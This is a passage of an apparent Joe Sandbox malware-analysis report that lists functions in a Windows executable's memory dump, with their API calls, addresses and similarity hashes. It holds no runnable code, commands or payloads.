                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                • String ID: close all
                                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                                • Opcode ID: 7633ffb0ce887d12b47ab62542770ee9619a145c8964bfe15b6c49086c1a34e3
                                                                                                                                • Instruction ID: 16131e63d82be7433ac25de7011eb0e858fbbdf603a2fb066c5177657757a446
                                                                                                                                • Opcode Fuzzy Hash: 7633ffb0ce887d12b47ab62542770ee9619a145c8964bfe15b6c49086c1a34e3
                                                                                                                                • Instruction Fuzzy Hash: 74915B35700602CFC719EF64CC95BA8F3A4FF45714F6442A9E40AA7262DB34ADA6EF50
                                                                                                                                Function 00F2C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00F2C2D2
                                                                                                                                  • Part of subcall function 00F2C697: GetClientRect.USER32(?,?), ref: 00F2C6C0
                                                                                                                                  • Part of subcall function 00F2C697: GetWindowRect.USER32(?,?), ref: 00F2C701
                                                                                                                                  • Part of subcall function 00F2C697: ScreenToClient.USER32(?,?), ref: 00F2C729
                                                                                                                                • GetDC.USER32 ref: 00F8E006
                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F8E019
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00F8E027
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00F8E03C
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00F8E044
                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F8E0CF
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                                • Opcode ID: 6ab3b663328081dc2a0da2a3ecbb2c26204ed7f038fc76d6faf6370f9a3ef9b7
                                                                                                                                • Instruction ID: 324ca31997f618685e7912be866e0442008b24075bc775a1d8c97dc7ce40a5e0
                                                                                                                                • Opcode Fuzzy Hash: 6ab3b663328081dc2a0da2a3ecbb2c26204ed7f038fc76d6faf6370f9a3ef9b7
                                                                                                                                • Instruction Fuzzy Hash: C771D431900209EFCF21EF64DC84AEA7BB5FF49360F144666ED565A1A6C7318841FBA1
                                                                                                                                Function 00F64C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F64C5E
                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F64C8A
                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F64CCC
                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F64CE1
                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F64CEE
                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F64D1E
                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00F64D65
                                                                                                                                  • Part of subcall function 00F656A9: GetLastError.KERNEL32(?,?,00F64A2B,00000000,00000000,00000001), ref: 00F656BE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1241431887-3916222277
                                                                                                                                • Opcode ID: b3c01dc02e0cb20a6daa237119a11ba0ab1071e3ae0d12f70c443c94b5781d70
                                                                                                                                • Instruction ID: a7c75546f6365be20971f76b10e7a3542db1fc20ce892730b14d76e720b38d24
                                                                                                                                • Opcode Fuzzy Hash: b3c01dc02e0cb20a6daa237119a11ba0ab1071e3ae0d12f70c443c94b5781d70
                                                                                                                                • Instruction Fuzzy Hash: 474181B1901618BFEB11AFA0CD85FFB77ACFF08754F104116FA01AA151D774AD44ABA1
                                                                                                                                Function 00F4AEE5 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                • _memset.LIBCMT ref: 00F4AF74
                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F4AFA9
                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F4AFC5
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F4B00B
                                                                                                                                • CLSIDFromString.COMBASE(?,?), ref: 00F4B033
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConnectConnection2FromQueryRegistryStringValue_memmove_memset
                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                • API String ID: 1159971868-22481851
                                                                                                                                • Opcode ID: c2eefa996f6978ef588df0c4ba05b2733b54ceb27535f7ac9a71293deccbfc0f
                                                                                                                                • Instruction ID: 22c3e3dd1acd5f5b5d35043b6ec1325398ba785790ba0c05d4988a9421721740
                                                                                                                                • Opcode Fuzzy Hash: c2eefa996f6978ef588df0c4ba05b2733b54ceb27535f7ac9a71293deccbfc0f
                                                                                                                                • Instruction Fuzzy Hash: 8C412A76C1022DABCF11EBA4DC85DEEBB78FF04710F40402AE911A21A1DB749E45EF91
                                                                                                                                Function 00F6BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00FADBF0), ref: 00F6BBA1
                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00FADBF0), ref: 00F6BBD5
                                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F6BD33
                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00F6BD5D
                                                                                                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 00F6BEAD
                                                                                                                                • ProgIDFromCLSID.COMBASE(?,?), ref: 00F6BEF7
                                                                                                                                • CoTaskMemFree.COMBASE(?), ref: 00F6BF14
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 793797124-0
                                                                                                                                • Opcode ID: 9b1ad3599fda2953178f1fc1264453084532f78caa8c4285048c882267b6f633
                                                                                                                                • Instruction ID: 99d30e089fe7301d9e9ee51a86398133569a4959a27d3e64c86b6b4e3713a59b
                                                                                                                                • Opcode Fuzzy Hash: 9b1ad3599fda2953178f1fc1264453084532f78caa8c4285048c882267b6f633
                                                                                                                                • Instruction Fuzzy Hash: E9F11975A00109EFCB14DFA4C884EAEB7B9FF89315F108459F905EB250DB35AE81EB90
                                                                                                                                Function 00F2B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F149CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F14954,00000000), ref: 00F14A23
                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F2B85B), ref: 00F2B926
                                                                                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00F2B85B,00000000,?,?,00F2AF1E,?,?), ref: 00F2B9BD
                                                                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00F8E775
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00F8E7EB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2402799130-0
                                                                                                                                • Opcode ID: 1c89e2ae6cc59b6173ab6bed2cc78ecac5d7963ada4f3c1636148722b39f6ebb
                                                                                                                                • Instruction ID: 4169c85a30be911c1728cf814ee4c2608372052d3849ed58abfdb7281c6d3bdc
                                                                                                                                • Opcode Fuzzy Hash: 1c89e2ae6cc59b6173ab6bed2cc78ecac5d7963ada4f3c1636148722b39f6ebb
                                                                                                                                • Instruction Fuzzy Hash: 9161CC31901715EFDB22EF25E888B69B7F6FF45322F24051AE98686670C734A8C0FB40
                                                                                                                                Function 00F7B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F7B204
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InvalidateRect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 634782764-0
                                                                                                                                • Opcode ID: 5e4419d50eb1aa1e635d841dc4ba98601d3210ceddc83c93bc3738fa4adc5cc5
                                                                                                                                • Instruction ID: fd78af7ca558e5da686e69ec04dcfe3782fe686fea93dd83e24ceb558088ecff
                                                                                                                                • Opcode Fuzzy Hash: 5e4419d50eb1aa1e635d841dc4ba98601d3210ceddc83c93bc3738fa4adc5cc5
                                                                                                                                • Instruction Fuzzy Hash: D8519331900218BFEB219F28CC89B9E3B65AB07324F60C117F91DD61A1CBB5D990FB52
                                                                                                                                Function 00F2A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F8E9EA
                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F8EA0B
                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F8EA20
                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F8EA3D
                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F8EA64
                                                                                                                                • DestroyCursor.USER32(00000000), ref: 00F8EA6F
                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F8EA8C
                                                                                                                                • DestroyCursor.USER32(00000000), ref: 00F8EA97
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3992029641-0
                                                                                                                                • Opcode ID: 85802b5290d753e100212bb0a01a157dccaa3b99fe8f8d73240475ab96bf5c07
                                                                                                                                • Instruction ID: c20506fc94eb26897acf9288d805c32fef4b2c8bdfd033c2049b18e33e25e2fc
                                                                                                                                • Opcode Fuzzy Hash: 85802b5290d753e100212bb0a01a157dccaa3b99fe8f8d73240475ab96bf5c07
                                                                                                                                • Instruction Fuzzy Hash: A5518871A00208AFDB24DF68DC82FAA7BB5BB48760F140619F94697290D7B4EC80EB51
                                                                                                                                Function 00F2F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F8E9A0,00000004,00000000,00000000), ref: 00F2F737
                                                                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00F8E9A0,00000004,00000000,00000000), ref: 00F2F77E
                                                                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00F8E9A0,00000004,00000000,00000000), ref: 00F8EB55
                                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F8E9A0,00000004,00000000,00000000), ref: 00F8EBC1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ShowWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                • Opcode ID: 9d70cae1c56cc4c2c0b3386dda39dc9bc5a670fdb155feb722e021330db7379f
                                                                                                                                • Instruction ID: 1ba26e9530e42ddcec54e01e9487f145153390d62391a883a4863d615cf4f927
                                                                                                                                • Opcode Fuzzy Hash: 9d70cae1c56cc4c2c0b3386dda39dc9bc5a670fdb155feb722e021330db7379f
                                                                                                                                • Instruction Fuzzy Hash: 08410D32A34694EBEB355738ACC8B767BB5BB45325F28083EE44782561C774E848F711
                                                                                                                                Function 00F4CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F4E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4E158
                                                                                                                                  • Part of subcall function 00F4E138: GetCurrentThreadId.KERNEL32 ref: 00F4E15F
                                                                                                                                  • Part of subcall function 00F4E138: AttachThreadInput.USER32(00000000,?,00F4CDFB,?,00000001), ref: 00F4E166
                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4CE06
                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F4CE23
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F4CE26
                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4CE2F
                                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F4CE4D
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F4CE50
                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F4CE59
                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F4CE70
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F4CE73
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                • Opcode ID: 836ade577e844b3e883c36dda4b91dbc0b494a0ecb7937a056056df508ea1dd4
                                                                                                                                • Instruction ID: 039192a79236aa487643f00998e410fc825707ff9952ec06fec69fa80e625537
                                                                                                                                • Opcode Fuzzy Hash: 836ade577e844b3e883c36dda4b91dbc0b494a0ecb7937a056056df508ea1dd4
                                                                                                                                • Instruction Fuzzy Hash: 4411C4B255061CBEFB106F648C8EF6E7E2DEB58754F600416F3406B1E1CAF26C41AAA4
                                                                                                                                Function 00F6C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F4A857: CLSIDFromProgID.COMBASE ref: 00F4A874
                                                                                                                                  • Part of subcall function 00F4A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00F4A88F
                                                                                                                                  • Part of subcall function 00F4A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00F4A89D
                                                                                                                                  • Part of subcall function 00F4A857: CoTaskMemFree.COMBASE(00000000), ref: 00F4A8AD
                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00F6C6AD
                                                                                                                                • _memset.LIBCMT ref: 00F6C6BA
                                                                                                                                • _memset.LIBCMT ref: 00F6C7D8
                                                                                                                                • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00F6C804
                                                                                                                                • CoTaskMemFree.COMBASE(?), ref: 00F6C80F
                                                                                                                                Strings
                                                                                                                                • NULL Pointer assignment, xrefs: 00F6C85D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                • API String ID: 1300414916-2785691316
                                                                                                                                • Opcode ID: c6f5939fb36c0170e5622e852b0cdeb2a1b01808a9854164f7722ce891c74bae
                                                                                                                                • Instruction ID: 9684909dfe19e1f89aad669522a2c41b12e889887873de96f11f60a0db377819
                                                                                                                                • Opcode Fuzzy Hash: c6f5939fb36c0170e5622e852b0cdeb2a1b01808a9854164f7722ce891c74bae
                                                                                                                                • Instruction Fuzzy Hash: 63915C71D01218AFDB10DFA4DC85EEEBBB8EF08750F20412AF559A7281DB745A45DFA0
                                                                                                                                Function 00F79882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F79926
                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F7993A
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F79954
                                                                                                                                • _wcscat.LIBCMT ref: 00F799AF
                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F799C6
                                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F799F4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
